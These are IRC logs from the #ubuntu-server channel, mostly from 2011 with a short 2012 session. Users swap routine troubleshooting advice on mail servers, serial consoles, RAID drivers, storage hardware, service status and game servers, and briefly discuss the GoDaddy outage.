<qman__> good user authentication, use TLS/SSL
<qman__> and general server security
<qman__> don't allow mail users to have SSH access
<qman__> just basic stuff
<oCean> Ronnie: the amount of effort depends on usage (of course) but generally speaking, system maintenance is a day-to-day task. Once setup, all you have to do is apply updates etc, and monitor logfiles
<ikonia> Ronnie: first thing to check is if your IP address is black listed by the public mail lists
<ikonia> Ronnie: no point looking at anything until you know that
<Ronnie> ikonia: where can i check that?
<ikonia> Ronnie: on the public internet
<ikonia> Ronnie: if you're not used to running a mail server, I'd advise you not to
<qman__> I say it depends on scope
<ikonia> Ronnie: I'd suggest looking at either a mail relay provided by your hosting partner, or one of the many subscription services.
<qman__> running your own mail server for one domain with a small number of users isn't that hard, and it's a good way to learn the caveats
<qman__> but if you have big needs, don't bother at this point
<qman__> I co-administer about 50 microsoft exchange servers, one mailenable, and I run a few postfix
<qman__> but whatever you do, do not bother with sendmail
<qman__> it's archaic and ridiculously overcomplicated
<Ronnie> qman__, ikonia. the amount of users is limited. we have customers who need to send invitations trough our webservices (primary reason) and second to send password-self-services mail. Also we want to receive some small amount of feedback and question mails.
<ikonia> Ronnie: if you have customers (paying) I would not advise doing it
<ikonia> (unless you know what you're doing)
<ikonia> if you end up not delivering mails, getting exploited, or getting them blacklisted, it may have business ramifications
<qman__> yeah, your first time should not be for a paying customer
<oCean> Ronnie: discussing the same topic in multiple channels is not polite
<Ronnie> question: is your opinion to outsource the service itself, the maintainance, i.e. (sla) commen for me as a startup webservice?
<Ronnie> oCean: i quitted in #ubuntu channel ;)
<oCean> I meant the -nl discussion. The ubuntu crowd is everywhere
<Ronnie> i usually prefer the dutch channels, but the english are more active and have better knowledge
<cocoa117> has anyone got xen domu ubuntu 11.04 PCI passthrough working? i mean through vt-d
<cocoa117> i got error message
<cocoa117> usbcore: registered new interface driver usbfs
<cocoa117> [    0.069076] usbcore: registered new interface driver hub
<cocoa117> [    0.069076] usbcore: registered new device driver usb
<cocoa117> [    0.069076] PCI: System does not support PCI
<cocoa117> [    0.069076] PCI: System does not support PCI
<cocoa117> i do have xen pci-front module installed
<magicblaze007> is there an easy way to add VM without rebooting?
<TDJACR> ANyone here have LXC experience?
<PleXs> <frozen>:38: DeprecationWarning: the whrandom module is deprecated; please use the random module
<PleXs> anyone know how to fix this?
<PleXs> install older python release? :)
<jmarsden> PleXs: Deprecation warnings are not a problem.  The code you have is working fine as is.
<PleXs> aah ok
<jmarsden> PleXs: They are a warning to developers of the Python app to update it soon so NEXT time, it will still work.
<jmarsden> PleXs: They have been turned off by defautl in Python 3.0 to avoid confusing users like you :)
<PleXs> nothing to worry about :)
<jmarsden> Exactly.
<RoyK> google was fine, but now, trying to find historic data is hard - seems first you have to filter out the google ads and then you have to write intricate queries to find what you're looking for, that is, if it wasn't yesterday's news
#ubuntu-server 2011-10-02
<DanaG> hmm, I got the same serial-console panic.  Now, what was I supposed to do to debug it?
<DanaG> Or rather, it's not a panic, because at least ZNC is up.
<DanaG> Yet, ssh is dead.
<DanaG> Should I just try a 3.x kernel?
<DanaG> Going to reboot.
<squidly> anyone know what I need to do so I can copy UFW rules between servers?
<DanaG> okay, I'm going to try 3.0.4 kernel.
<DanaG> Not trying 3.1 until it's out of RC, since this is my server that I need to have stable.
<squidly> DanaG: I'm running 3.0.4 on my desktop at work. I really like it. The 3.0.4 kernel is very stable
<mdeslaur> squidly: look in /lib/ufw, there should be a user.rules file you can copy over
<squidly> and how to I activate it?
<DanaG> say, how do I disable the auto-blanking of tty0 (uvesafb)?
<patdk-lap> danag, looks like it's an asci thing
<patdk-lap> http://www.linuxquestions.org/questions/linux-server-73/how-to-disable-console-blanking-in-text-mode-780272/
<DanaG> ALso fiddling with serial console while I'm at it.
<DanaG> Stupid HP... uses an IPMI chip that supports SOL, but doesn't expose that serial port.
<DanaG> So I have to have a PCIe-1x serial port card.
<patdk-lap> why not use ipmi over ip?
<DanaG> Well, what I mean is: I got the HP remote access card for my Microserver, and there's no serial-over-LAN feature.  There's a java viewer, but that's no good for grabbing stacktraces and all that.
<DanaG> The IPMI chip itself, ASPEED AST2150, supports SOL... but HP's system BIOS doesn't expose it.
<DanaG> going to reboot the server (also happens to have ZNC on it).
<DanaG> http://pastebin.com/85CNMLK5
<DanaG> okay, so, grub doesn't like the pcie serial.
<DanaG> Unknown serial port.  :(
<DanaG> dangit, zfs modules don't like 3.0.4.
<DanaG> http://pastebin.com/85CNMLK5
<DanaG> there's the serial console oops.
<DanaG> I'll be swtiching to btrfs as soon as it has a fsck that'll fix things.
<patdk-lap> heh, isn't that scheduled for sometime within the next 5 years?
<patdk-lap> it just seems like play toys are more important for btrfs currently, than stability
<DanaG> Byobu doesn't work over serial:
<DanaG> strace:  http://paste.ubuntu.com/700831/
<jmarsden> DanaG: That looks like a permissions issue on /var/run/screen, notthing related to it being a serial connection, to me ... ?
<DanaG> What's weird is that the same permissions work fine over ssh.
<DanaG> And the same sort of hang happens with aptitude, I think.
<DanaG> I'll pastebin a strace of aptitude.
<DanaG> heck, even fgconsole hangs.
<DanaG> open("/proc/self/fd/0", O_RDWR
<DanaG> And in fact, aptitude hangs when run normally, but when redirected to strace, it shows colors for a moment.
<jmarsden> DanaG: For the aptitude ncurses UI to work, you would need an appropriate termtype set, is that (part of) the issue??
<DanaG> $TERM is "linux"
<DanaG> http://paste.ubuntu.com/700835/
<DanaG> there's aptitude.  Did 2>aptitude.txt and then gave it sigquit when it hung.
<DanaG> Then sent the contents of aptitude.txt to pastebinit.
<jmarsden> Are you on ttyS5 ?  That looks like it looked at at /dev/tty0 and then tried to open /dev/ttyS5 and ... it all ended!  I'm guessing, but you could check permissions on both /var/run/screen and the serial device (/dev/ttyS5 or whatever it really is).
<DanaG> The second trace is just running aptitude, so screen is out of the picture.
<DanaG> And yup, the serial console is ttyS5.
<DanaG> There's no 0 or 1 or 2 or 3.... just 4 and 5.
<DanaG> hmm, even as root, aptitude hangs the same way.
<jmarsden> Any difference if you do   export TERM=vt100 ; reset $TERM     first?
<nronksr> What is the output from the following on an ubuntu server's portmapper?: strings /sbin/portmap | grep hosts
<nronksr> I'm looking specifically at 10.04, but any would do at this point.  Thanks!
<DanaG> jmarsden: yup, that gives me a monochrome aptitude.
<DanaG> Oddly, exporting TERM=screen works, as well.
<DanaG> Though, it does use this on the "quit?" dialog:
<DanaG> lqqqqqqqqqqqqqqqqqqqqqk
<jmarsden> DanaG: OK.  So the issue was the termtype... good.  Now you need to figure out what termtype your terminal "really" is so you can set one that works 100%.  It's been 15 years since I worked with termcap and termtype :)
<DanaG> dangit, same oops on closing serial console.
<DanaG> good, 2.6.39 seems to work.
<jakemp-home> I'm setting up ubuntu server 11.04, and  I keep getting "Don't seem to have all the variables for eth0/inet" when I try to 'sudo ifup eth0'. I'm following the ubuntu server guile page for this
<bfri> can anyone help me set up a pptp vpn
<iggi_> Hello, does anyone have a link to a good guide on how to connect to VPN (I'm using OpenVPN) via command line in ubuntu server?
<jmarsden> iggi_: It is not Ubuntu-specific, but the OpenVPN Mini-HOWTO for a really basic setup is at http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html
<iggi_> jmarsden, Thanks, I'm just trying to figure out how to setup multiple VPN connections on a monitoring server to monitor hosts behind firewalls at various locations
<uvirtbot> New bug: #864495 in samba (main) "package samba-common 2:3.5.4~dfsg-1ubuntu8.4 failed to install/upgrade: there is no script in the new version of the package - giving up" [Undecided,New] https://launchpad.net/bugs/864495
<D0minat0r> is it possible to have a usb webcam live feed on ubuntu server without installing gui?
<smw> D0minat0r, I think vlc can do that
<smw> D0minat0r, that is where I would look
<D0minat0r> smw: ok thanks will look into it
<Dulcin> Hi I'm not sure if this is making sense but: For our current domain I have set up google apps and am using google's mx records for email
<Dulcin> but now I'm setting up an smtp server on our server as well, which I only want to use for our automatic mails sent through PHP
<Dulcin> does that make sense? and does it require a new mx record or should I keep the hostname in the settings the same as the IP?
<Dulcin> is TLS good to set up, even if postfix is set to a null configuration?
<ikonia> what ?
<ikonia> null configuration ?
<ikonia> "good to setup" ?
<ikonia> Dulcin: any chance you could try to re-ask that question explaining a little better ?
<dnmons> Hi. My postfix is not listing auth capability after tls/ehlo. Iâm trying to use dovecot sasl. no helpful information in error log. Iâm hoping someone can offer advice. postconf -n http://pastebin.com/yrpCe7jf and dovecot -n http://pastebin.com/LpkxQtBz IMAP/dovecot itself is working.
<ikonia> dnmons: dovecot and postfix are two seperate things, which one is not working
<dnmons> ikonia: I assume dovecot is working just fine. as authenticating against it works. and it is the smtp connection that is not offering auth capabilities.
<ikonia> so forget dovecot, just focus on postfix
<Dulcin> ikonia: Well, I took that 'null setup' from the postfix documentation, let me try and explain what I want
<Dulcin> ikonia: I currently have Google Apps set up which handles all the mail. But now I want our website to send mail securely as well. So I set up postfix, and since I only want the webserver to send mail (and not receive) I figured I can set it up in a 'null client'*
<Dulcin> At first I tried to set it up with SASL and try sending with TLS, but I couldn't get that to work and while reading up on postfix, I noticed the null client might even be better
<Dulcin> so my questions was...
<Dulcin> does my mailserver need its own mx record, or since I'm only sending mail, it is obsolete
<Dulcin> and can I leave the TLS/SASL/certificate, etc. out of my setup, if it is only set up as a 'null client'
<Dulcin> ikonia: like: since nobody else can use it anyway (i think), I dont need to add an extra security layer
<Dulcin> maybe I'm way off with my reasoning
<Olotila> is virtualized ubuntu inside ubuntu fast?
<Olotila> I'm using 11.04 now but need 10.04LTS because it supports my new raid adapter
<JanC_> Olotila: some things are very fast when virtualised using hardware that assists virtualisation, other things get more of a performance hit, and there are also differences between virtualisation technologies, so there is no simple answer to your question  âº
<JanC> also, why doesn't 11.04 support your raid adapter?
<JanC> (and why don't you use software raid instead?)
<Olotila> not sure why, it is adaptec 6805E and they boast about their support for Linux
<Olotila> gave "too many errors" when I tried
<Olotila> I use hw raid because I use both windows and linux
<Olotila> I used mobo raid (intel ich10r) but it's not supported in linux
<Olotila> if I used sw raid it would not work in windows
<Olotila> my virtualized usage would be almost 100% usual surfing and getting to know Ubuntu
<Olotila> using max 10% of my current PC resources
<Olotila> 4(+4) cores, 6GB ram
<RoyK> Olotila: 11.04 isn't too good a choice for servers anyway
<ppetraki> Olotila, if you're really that concerned about performance, go ahead and install 10.04 to the RAID and the use a recovery CD
<ppetraki> Olotila, from the recovery CD, chroot to your RAID, and then install a "backports LTS" kernel, like the Natty one
<ppetraki> Olotila, which should get you the HW support you desire
<RoyK> Olotila: that ich10r raid controller isn't a real raid controller
<ppetraki> RoyK, he's got an Adaptec too
<RoyK> ppetraki: so I saw - just wanted to comment on that intel thing
<RoyK> Olotila: i'm running a few VMs virtualized with kvm - works like a charm
<RoyK> one of the VMs is running Zimbra, which can be a bit on the heavy side
<RoyK> still works well, on an old core2 duo
<ppetraki> Olotila, just confirmed that there is a "natty lts backport" package: linux-image-server-lts-backport-natty
<RoyK> ppetraki: why would he need that?
<ppetraki> RoyK, so he could run 10.04 on baremetal
<RoyK> why can't he just use the lucid kernel?
<ppetraki> RoyK, iif he's *that* concerned with performance
<RoyK> newer kernel != better performance
<ppetraki> RoyK, "<Olotila> I'm using 11.04 now but need 10.04LTS because it supports my new raid adapter"
<RoyK> 'cept with oneiric comes xen, which is a wee jump in performance
<ppetraki> RoyK, implies 10.04 doesn't support that HW
<RoyK> ppetraki: what he said there was that 11.04 didn't support his hardware
<RoyK> Olotila: can you clear this out, please? does 11.04 support your hardware?
<ppetraki> RoyK, that doesn't make sense. how does a older release have the hardware enablement he needs?
<RoyK> bugs do happen
<ppetraki> well, that would be a bug :)
 * RoyK even sticks to hardy on some machines
<JanC> there might be a closed source driver for LTS or something...
<JanC> Olotila: if you just want to do surfing with Ubuntu, why don't you run an Ubuntu VM on your existing Windows?  ;)
<JanC> in any case, performance probably won't be an issue for surfing
<ppetraki> RoyK, it looks like the aaraid driver but I can't find a hit for that product id in the pci ids list, in either lucid or natty
<JanC> even a 400 MHz machine with 256 MiB of RAM is fast enough for surfing...
<RoyK> oh - same old pci id issue
<ppetraki> Olotila, could you provide a pci id for the Adaptec card?
<RoyK> JanC: erm - that depends where you surf :P
 * RoyK thinks Olotila has fallen asleep
<ppetraki> :)
<ppetraki> Adaptec provides a dkms for "debian 5 and Ubuntu 10.04", even a package for the installer
<JanC> RoyK: maybe if you want to play Doom ported to WebGL & JavaScript that is not enough, but basically for every other website it's plenty  ;)
<RoyK> JanC: add some java and flash and html5 and js and whatever's in use out there, and your 400MHz machine will choke itself before you get the average news site opened
<JanC> most news sites work fine without JavaScript actually  ;)
 * RoyK just got a pandaboard - little single board thing with a dual-core Cortex A9, some helper cores at 266MHz, 1GB RAM, wifi, SD card and cameras connectors, dual HDMI out, total <$200
<RoyK> no need for some old power-consuming 400MHz beast then...
<JanC> right, I was just talking about what performance is really *needed*
<RoyK> that depends on use
<RoyK> what about your average dual-core 1GHz coretex9 in your new phone? ;)
<RoyK> btw, this is rather fun http://pandaboard.org/
<JanC> even a simple single-core Cortex A8 can play full HD movies while surfing all you want... (your pandaboard has 4 cores!)
<RoyK> yeah, but only two general purpose-cores
<RoyK> the smaller ones must be programmed with specific API calls
<JanC> it has 4 GP cores IIRC, but 2 of them are very slow (but also consume almost no power)?
<RoyK> but fine for offloading simple stuff like controlling a camera without waking up the main cores
<JanC> might require special API calls indeed
<RoyK> they do - I checked...
<JanC> but I guess that also depends on the OS
<RoyK> well, it's probably possible to have the OS handle that, but I really don't want to start to rewrite the linux scheduler
<JanC> and of course it also has several special purpose cores
<JanC> for encoding/decoding video, for graphics, etc.
<JanC> basically, it's more advanced than your desktop processor  ;)
<RoyK> it's neat :)
<JanC> the only disadvantage being that there is no proper driver for the GPU core...
<JanC> personally I'd rather see a similar board with s BTW  âº
<JanC> personally I'd rather see a similar board with lots of SATA adapters BTW  âº
<RoyK> indeed :D
<RoyK> I wonder...
<JanC> would be great for building a NAS / home server
<JanC> and maybe you could off-load RAID computations to the low-power cores
<JanC> and maybe also encryption
<RoyK> those A9s would do well for that
<JanC> both disk & network encryption
<JanC> it should be possible to create a fantastic A9 and/or A15 based SoC for home/SoHo servers
 * patdk-lap wonders if the market for one is high enough
<JanC> patdk-lap: if I see how many NAS are sold currently, there should be
<RoyK> JanC: AFAICS the only interface for mass storage on the panda is usb
<JanC> RoyK: I know, I looked at it as a possible replacement for an existing NAS  ;)
<JanC> there is no proper PCI interface to extend it either
<JanC> PCIe
<JanC> and the GPU is useless for that purpose
<JanC> so obviously OMAP SoC's are designed for another purpose
<RoyK> I just asked on #pandaboard and was told
<RoyK> drscott> RoyK - I have not found a sata interface for the panda board - however the freescale i.mx53 quick start board has  a chip-supported sata port
<JanC> that's what is used in the "Plug" computers IIRC?
<RoyK> dunno
<JanC> or at least something like that
 * RoyK checks lshw on his guruplug
<RoyK> hm.. nothing there
<sampiale> Hello
<JanC> RoyK: nothing in /proc/cpuinfo either?
<RoyK> http://paste.ubuntu.com/701061/
<RoyK> btw, if you ever get a guruplug or similar, don't try lucid on it :P
<patdk-lap> royk, heh, oi fell completely over when I attempted to use both my ib interfaces at once :)
<RoyK> wtf?
<patdk-lap> I was getting about 350MB/sec over both ib links, one at a time, if I used both at the same time 36MB/sec
<RoyK> ouch
<patdk-lap> had to do some /etc/system tweaking, and it's getting me a good 800MB/sec over both now :)
<RoyK> neat
<patdk-lap> at the same time
<RoyK> what sort of ib?
<patdk-lap> just 10g currently
<RoyK> I didn't know there was a 10g
<patdk-lap> heh? normal is 10g 20g and 40g
<RoyK> or 8/16/32...
<patdk-lap> for throughput rates
<RoyK> ah
<RoyK> ic
<patdk-lap> signalling rates is what they go by, like with FC
<RoyK> ic
<RoyK> patdk-lap: mass storage?
<patdk-lap> attempting to replace a netapp
<patdk-lap> looked like iscsi fixed all my random seek test issues
<patdk-lap> so I will probably use a mix of iscsi and nfs
<RoyK> k
<RoyK> what sort of hardware/drives?
<patdk-lap> x8sia-f, 3.3ghz i3, 20 ultrastore a7k
<RoyK> i3???
<patdk-lap> ya
<RoyK> wouldn't you want ECC on such a box?
<patdk-lap> it has ecc
<patdk-lap> only ecc is supported
<RoyK> i3 doesn't support ECC
<patdk-lap> you mean, registered is not supported
<RoyK> the memory controller in i[357] doesn't use ECC
<RoyK> you need a xeon for that
<RoyK> http://www.intel.com/support/processors/corei3/sb/CS-031175.htm#10
<patdk-lap> ya, so ecc memory is required, but the ecc is not used
<JanC> lol, what's the use for that?  :P
<JanC> I mean, having to buy expensive memory that has no benefits?
<RoyK> patdk-lap: the mobo may require ecc memory, but the memory controller, residing in the processor package, doesn't use it
<patdk-lap> well, it's only going be in use for a few months
<RoyK> patdk-lap: you're not the first to make that mistake - I had an i3 replaced by a xeon just a few months back :P
<patdk-lap> till it goes back offline again
<RoyK> data corruption can still be rather expensive
<RoyK> and a new Xeon to fit into that socket can be rather cheap
<patdk-lap> there are hundred of other places for datacorruption also
<RoyK> the new xeon is likely to be about the same price as one of the drives :P
<patdk-lap> looks like $350 for a 2.9ghz
<RoyK> still, that'll give you ECC
<patdk-lap> drives are like half the price of the cheapeast x34xx
<RoyK> what sort of disk layout? mirrors?
<patdk-lap> just mirrors
 * RoyK thinks it's rather silly to give up ECC on such a system
<RoyK> a7k 2TB?
<patdk-lap> 1tb drives
<patdk-lap> don't need the space at all
<RoyK> database or VMs?
<patdk-lap> probably end up using it for crapload of snapshots
<patdk-lap> neither
<patdk-lap> email
<RoyK> k
<RoyK> 9-10TB for email sounds roomy ;)
<patdk-lap> currently using 1.6
<RoyK> with dedup on that netapp?
<patdk-lap> but need the spindles
<patdk-lap> nope
<RoyK> some SSDs for caching as well?
<patdk-lap> it's a netapp that doesn't support anything than nfs
<RoyK> oh
<patdk-lap> ya, have ssd's on the way, think they got lost in shipping
<patdk-lap> netapp can't even support dedup if we wanted
<RoyK> old one?
<patdk-lap> fas270, not even a fas270c
<patdk-lap> so far my tests show good performance on everything, about 6x increase, excepted for that random seek test I was doing, but I can't replicate that test correctly currently
<RoyK> how much for the whole system?
<RoyK> just a SM 24slot chassis?
<patdk-lap> 4.6k about
<RoyK> USD? EUR? ISK?
<patdk-lap> usd
<RoyK> not bad
<patdk-lap> think I'm going use the 5k3000 for the next one
<RoyK> won't that be a bit low on the seek times?
<patdk-lap> 70 vs 81 per drive
<patdk-lap> but going put it into backup service
<Olotila> ppetraki, RoyK, JanC, sorry fell asleep ... nah, just rl stuff
<patdk-lap> to hold a mirror copy, and to stream to tape
<Olotila> adapter is Adaptec 6805E
<Olotila> when installling, it reports "too many errors"
<Olotila> thats why I started thinking other options
<RoyK> Olotila: that's on lucid?
<RoyK> patdk-lap: the 7k3000s aren't too expensive, though
<Olotila> performance is not the main issue
<patdk-lap> royk, ya, but 3g only :(
<patdk-lap> they are slowing down the whole bus
<Olotila> I rather go on native hw, and virtualization seems a little silly
<RoyK> patdk-lap: 7k2000?
<patdk-lap> I could cut my resilver time in half with 6g
<Olotila> but if that is way easiest, i could go that way
<RoyK> patdk-lap: the new 7k2000 are 6g
<Olotila> but if i get drivers to 11.04, that would be ideal
<RoyK> patdk-lap: Hitachi HDS723020BLA642
<Olotila> natty lts backport seems to be "deleted" atm
<Olotila> I do have Ubunti in VM too, but I prefer native environment
<RoyK> Olotila: linux-image-2.6.38-11-server ?
<patdk-lap> royk, odd, they are not listed on hitachi's website, only 3g's
<RoyK> I have about 160 of those
<Olotila> this is 11.04 x64 desktop
<RoyK> Olotila: apt-cache search linux-image
<patdk-lap> heh, you guys have it backwards
<RoyK> patdk-lap: and they have written 6g on the drives
<patdk-lap> he wants to run a lucid kernel on natty :)
<RoyK> oh
<RoyK> Olotila: install lucid :P
<patdk-lap> royk, those are 7k3000's, not 7k2000
<RoyK> still 2TB
<RoyK> bought 150 of them and got them for a little less than $100 a piece
<RoyK> s/less/more - $101,something
<RoyK> Olotila: sorry - is it the 11.04 kernel that complains about these errors, or the lucid kernel?
<Olotila> Royk, yeah, I did fail to install 10.04 to this hw
<Olotila> RoyK, yes
<RoyK> Olotila: latest 10.04.3 cd?
<Olotila> arg sorry, the 11.04 complains
<Olotila> yes, latest
<RoyK> erm.. does 10.04 or 11.04 complain?
 * RoyK is slightly confused
<Olotila> 11.04 says too many errors
<RoyK> then don't use it
<RoyK> use lucid
<RoyK> meaning 10.04
<Olotila> 10.04 does not install natively
<RoyK> oh
<Olotila> just hangs
<RoyK> try hardy ;)
<Olotila> i might try harder :)
<RoyK> hardy == 8.04
<RoyK> still supported
<Olotila> i could try cd install instead of usb-stick, and a few different isos
<RoyK> it shouldn't make much difference installing from a CD or an USB stick
<Olotila> yeah, i know
<Olotila> *shouldnt, one of the ugliest words known to man :)
<RoyK> maybe...
<Olotila> i usually flinch when i hear "it should work"
<RoyK> :)
<RoyK> perhaps Oneiric beta? :)
<Olotila> is there any good advice when trying to install ubuntu and it does not want to complete the installation?
<JanC> maybe the drivers are not included...
<Olotila> any general tips
<RoyK> Olotila: where in the installation does it hang?
<RoyK> Olotila: also, is this a desktop or server installation?
<Olotila> will not even show the ubuntu text and the five balls
<RoyK> desktop has far more bits and is harder to debug
<Olotila> either one would do
<RoyK> does the cd bootup fail?
<RoyK> or usb
<RoyK> or whatever
<RoyK> if so, try noacpi and noapic
<RoyK> as a start
<Olotila> it does not go very far, cannot even "try" ubuntu
<RoyK> iirc press f6 and you'll get those choices from there
<RoyK> Olotila: 'try ubuntu' implies  you're installing desktop, not server
<Olotila> so server installs more likely, and I can better my odds with those choises I get with F6?
<Olotila> and disable acpi from bios?
<RoyK> just try server first
<Olotila> ok
<RoyK> it should be more verbose than desktop
<Olotila> does it write log somewhere?
<RoyK> meaning better at yelling at you
<RoyK> no logs before the system is installed
<RoyK> but it'll log to the console
<RoyK> which should suffice
<Olotila> yeah
<patdk-lap> hmm, if the ubuntu with the balls appear, that means the kernel is done loading, and it's started the init scripts
<patdk-lap> so it's working
<patdk-lap> just some startup thing is holding it up
<Olotila> any difference between 32 and 64 bit?
<RoyK> Olotila: yeah, one is 32bit, the other is 64bit
<patdk-lap> dunno why you keep talking about the desktop install though, in the server channel
<Olotila> RoyK, i mean the odds of successfull installing
 * RoyK hands patdk-lap a beer
<RoyK> Olotila: none whatsoever, if you're on a 64bit machine
<Olotila> patdk-lap, because I know here are pretty knowledgeable guys :)
<RoyK> Olotila: if you're on a 32bit machine, installing 64bit is quite likely to fail early :P
<patdk-lap> hehe, I have had all kinds of issues some machines
<patdk-lap> have a motherboard, that I put a 64bit cpu in, no issue
<Olotila> and i am installing server stuff too
<patdk-lap> but the motherboard refuses to boot any 64bit or even pae kernels
<patdk-lap> only worked in plain 32bit mode
<RoyK> Olotila: thing is, this channel is for the server _distro_, not the server bits
<RoyK> patdk-lap: wtf? something you got cheap on ebay? ;)
<patdk-lap> some msi neo motherboard
<patdk-lap> was only for a home desktop system
<patdk-lap> also had 4 memory slots, but you where only allowed to use 2 at a time
<patdk-lap> very strange motherboard
<RoyK> patdk-lap: hehe
<Olotila> Well, I'll try your advice and perhaps chat from within 10.04 server
<Olotila> thanks, thumbs up
<RoyK> patdk-lap: I've come by mobos that work well with either two or four memory modules, but clocked them down if all four were installed
<RoyK> Olotila: break a leg :)
<patdk-lap> royk, that is normal on all intel mmu systems
<RoyK> oh
<RoyK> it is?
<patdk-lap> the intel memory thing, has channels, and each channel supports 2 or 3 sticks
<patdk-lap> depending on if it's desktop or server model
<patdk-lap> if you use and adition stick, for 3 or 4, then the bus goes 800mhz instead of normal
<patdk-lap> or if you use qrank memory
<patdk-lap> nice if you need bulk memory
<patdk-lap> bad if you need to access memory quickly
<RoyK> so I guess we should have bought fewer, larger modules for our compute nodes?
<patdk-lap> as long as they where dual rank sticks
<RoyK> quad
<RoyK> it's opteron
<patdk-lap> dunno about opteron
<patdk-lap> but quad rank normally will slow any intel system down to 800mhz, and you can't use the extra slot
<KM0201> how can i see a list of running services?
<RoyK> but then, with quad, we get a bit wider memory buses than on xeon
<RoyK> KM0201: ps axf
<patdk-lap> heh?
<patdk-lap> quad what?
<KM0201> RoyK: thats a little to detailed
<patdk-lap> km0201, little too detailed :)
<KM0201> i was looking for... if samba is running, if mysql is running, etc.
<patdk-lap> service mysql status
<patdk-lap> service samba status
<patdk-lap> ...
<RoyK> or even
<RoyK> status mysql
<KM0201> yeah, that would work, then i'd have to go through and type that command for each service.
<RoyK> KM0201: afaik, ubuntu doesn't have any better way to do that
<KM0201> yeah, thats the realization i was coming to as well.
<patdk-lap> hmm, how evil
<patdk-lap> hp infiniband switchs don't support any subnet manager
<RoyK> patdk-lap: what's a subnet manager?
<patdk-lap> it manages infiniband routing basically
<patdk-lap> without it it would be like ethernet without arp
<JanC> KM0201: "initctl list" ?
<patdk-lap> you can run a subnet manager on a windows/linux machine (not on solaris) if you want
<JanC> (and maybe filter out what's running)
<patdk-lap> but as I was going vmware/oi, that isn't nice
<KM0201> JanC: that's what i'd like to do, is filter out what is running
<KM0201> that one is close though
<patdk-lap> might have to hang one of my old machines and give it a infiniband card to connect and do that then :(
<JanC> well, grep for "start/running" I guess ;)
<patdk-lap> at home here, my infiniband switch has it built in, so it's all nice :)
<JanC> or maybe even just "running"
<VampsDaBeast> what would be the best minimium GUI for 10.04 that will be used to run game servers like Nexuiz, and the like.
<TomasBrincil> GUI like graphic user interface?
<VampsDaBeast> TomasBrincil, yea, like XFCE and th elike
<TomasBrincil> it does not matter, i guess...
<VampsDaBeast> wouldnt want any thing to heavy though correct?
<VampsDaBeast> like xfce or lxde would prolly work best
<TomasBrincil> i bet, both of them will work..
<VampsDaBeast> kool..thanks
<RoyK> VampsDaBeast: apt-get install ubuntu-desktop
<qman__> they'll all work
<qman__> if you want bare minimum, go with something like xdm or icewm
<qman__> or any of the other super minimalist ones
<pmatulis> sudo aptitude install lubuntu-desktop
<pmatulis> ah, prolly not available on 10.04
<qman__> regardless, even a more lightweight desktop is still a full desktop
<qman__> I took it he needed a bare minimum window manager to run a poorly designed server that won't run without X
<qman__> like ut2k4's
 * RoyK remember setting up a 386dx20 with X, fvvm2, with 2MB RAM, back in 1994 or so
<RoyK> it took the box some 2-3 minutes to start a simple app :P
<VampsDaBeast> now really qman..
<VampsDaBeast> not**
<VampsDaBeast> i'm working towards making a box that will run some of the linux based FPS like Nexuiz, OpenaArena and the like.
<VampsDaBeast> but as d-servers instead of played on
<qman__> properly designed dedicated game servers don't need X
<qman__> that said, there are plenty that are not properly designed
<VampsDaBeast> so to run many of those as dedicated servers.. all i need is ssh?
<VampsDaBeast> so to speak
<qman__> a correctly written game server is the same as any other server, it just runs in the background and logs output when necessary
<qman__> possibly provides an interface
<qman__> unfortunately many are not designed this way
<qman__> srcds, for example, will only run on an interactive console
<qman__> and as mentioned, ut2k4 spawns its own interactive X-based console
<qman__> I don't know about nexuiz or openarena, but if made right, they shouldn't need anything of the sort running
<qman__> minecraft also only runs on an interactive console
<VampsDaBeast> so again, i would only need open ssh
<qman__> only if you need remote shell access
<VampsDaBeast> not many server's have heads do they?
<qman__> my point is, ssh is not a requirement for a game server
<qman__> it's simply accessory
<qman__> you probably want it
<qman__> but it's not required
<VampsDaBeast> ok
<VampsDaBeast> is there any packages for monitoring?
<qman__> depends on what you want to monitor
<qman__> there's tons of them
<VampsDaBeast> some that would monitor the game server setup
<qman__> depends on that game server
<qman__> it's not really a standard thing
<VampsDaBeast> i'm just gettin awake so words arent coming to me
<qman__> each game or game engine does its own thing
<qman__> you could port monitor to see if it's up, or monitor that the process is running, but that's about it regarding the game server itself
<VampsDaBeast> how bout activity?
<VampsDaBeast> like number of users connected, map , stats
<VampsDaBeast> stuff ike that..
<qman__> all part of the game server you're running
<qman__> if it's available at all, it's going to be specific to your game
<VampsDaBeast> the game i'm lookin at is nexuiz.
<qman__> I don't know about it, I've never used it
<qman__> but you'll have to see the documentation on the game server
<qman__> probably check out any communities around the game
<qman__> that sort of information only exists inside the game, and as such is specific to each game or game engine, it's not something you can poll in a standard manner
<VampsDaBeast> ok
<qman__> you might be able to load scripts for that game server, or write something up to parse log files if it has some
<iFire> What's the successor to JeOS?
<iFire> ubuntu-vm-builder in some form
<args[0]> is there any good tutorial on how to install ventrilo on a ubuntu server?
<KM0201> args[0]: this is for 9.10 but.. it may point you in the right direction.
<KM0201> http://rocketeerbkw.com/content/installing-ventrilo-server-ubuntu-910-karmic-koala
<args[0]> I was checking that out earlier, but I asked myself.. why should I create a user just for ventrilo? KM0201
<KM0201> args[0]: honestly, i was just wondering that myself.. but some people just do stuff like that (for instance, I create FTP user for FTP access)
<args[0]> KM0201: hmm.. I see. Thanks for your input.
<KM0201> args[0]: if thats your only deal breaker though... you can easily skip that step.
<args[0]> KM0201: true
#ubuntu-server 2012-09-24
<linocisco> hi all
<segv> ello
<linocisco> I am sure everybody is aware of attack on Godaddy's website . Ubuntu site is backed by Godaddy. I am wondering how much it affected on ubuntu site.
<segv> No clue, which attack?
<linocisco> segv, DDOS
<segv> The recent attack that they played off?
<segv> as a router misconfig?
<smw> linocisco, the service went down, but they claim it was not a DDOS
<linocisco> segv, yes. by Annoymous
<smw> linocisco, they claim it was their problem
<linocisco> smw, how long was which service down?
<smw> Hours
<smw> not sure how long
<segv> yeah
<segv> most of the day
<segv> standard PST work hours 9-5+ a few
<smw> yep
<smw> pissed me off to no end
<linocisco> smw, it is the problem of Godaddy, but ubuntu is authenticated through it. I am wondering if hackers could penatrate
<smw> had me running in circles
<smw> not really...
<segv> linocisco: if it was down, they weren't penetrating much haha
<smw> linocisco, the took it down... that is sort of the opposite ;-)
<linocisco> smw, so ubuntu website was down for a couple of hours?
<shauno> where are you getting the impression they're 'backed' by godaddy?
<apw> Daviey, hey is it expected that after installing kvm and virt-manager, you need to reboot to make it work
 * ogra_ wouldnt see a reason for this 
<ogra_> (but i cant remember if i actually had to when i installed that setup)
